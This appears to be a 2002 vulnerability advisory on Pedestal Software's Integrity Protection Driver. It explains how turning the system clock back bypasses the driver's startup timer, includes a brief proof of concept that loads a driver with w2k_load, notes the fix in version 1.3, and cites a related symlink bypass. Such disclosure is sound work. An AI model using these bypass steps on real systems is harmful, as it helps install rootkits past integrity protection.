Bypassing Pedestal Software Integrity Protection Driver (time vulnerability) Jan K. Rutkowski jkrutkowski@elka.pw.edu.pl What is IPD? ------------ Taken from the IPD's readme: "The IPD is an Open Source device driver designed to prohibit the installation of new services and drivers and to protect existing drivers from tampering. It installs on Windows NT and Windows 2000 computers. [...] This driver was created to provide protection against rootkit installation by attempting to block any new kernel code from being installed and executed. This will help to prevent tojan hiding from integrity checking programs such as Intact. " To to give administrator possibility to uninstall IPD, the driver starts protecting the system 20 minutes after being loaded. This is acceptable, because we can assume that right after reboot server can be disconnected from the Internet. The Bug ------------ In order to provide 20 minutes delay on startup, restrictEnabled() function is used. It is called from other functions to check, whether they should be restrictive about various actions (like loading drivers) or not: int restrictEnabled() { LARGE_INTEGER curtime, diff; KeQuerySystemTime(&curtime); diff = RtlLargeIntegerSubtract(curtime, Globals.DRIVERSTARTTIME); if (RtlLargeIntegerGreaterThan(diff, Globals.RESTRICT_STARTUP_TIMEOUT)) return 1; return 0; } One can easy circumvent IPD's protection by turning system clock back. (Yes, one must own SeSystemtimePrivilage, but that is not a problem when the attacker has gained privileged access to the system). Proof-Of-Concept ------------ 00:00 [real admin starts IPD on his server] c:\ipd>ipdinstall.exe start [...] The driver will engage in 20 minutes. c:\ipd> 00:21 [IPD starts protecting the system from inserting drivers] ... 13:13 [a bad hacker comes in to the system] c:\alamakota> time [now he turns the clock 14 hours back] c:\alamakota> w2k_load verybaddrv.sys c:\alamakota> time [he restores the original time] [system is compromised] This was tested against IPD 1.2. Patch ------------ I have contacted Pedestal Software, and they released (on Monday 2/12/2002) a new version (1.3), which fixes this vulnerability. This can be downloaded form IPD home page (see References below). Postscriptum ------------ Another IPD vulnerability, was described by crazylord in the last issue of phrack. He showed how to cheat IPD so that it allows writing to /Device/Physicalmemory (by creating a symlink). This vulnerability has also been fixed in the new version 1.3. References ------------ * IPD homepage: http://pedestalsoftware.com/intact/ipd/ -- jan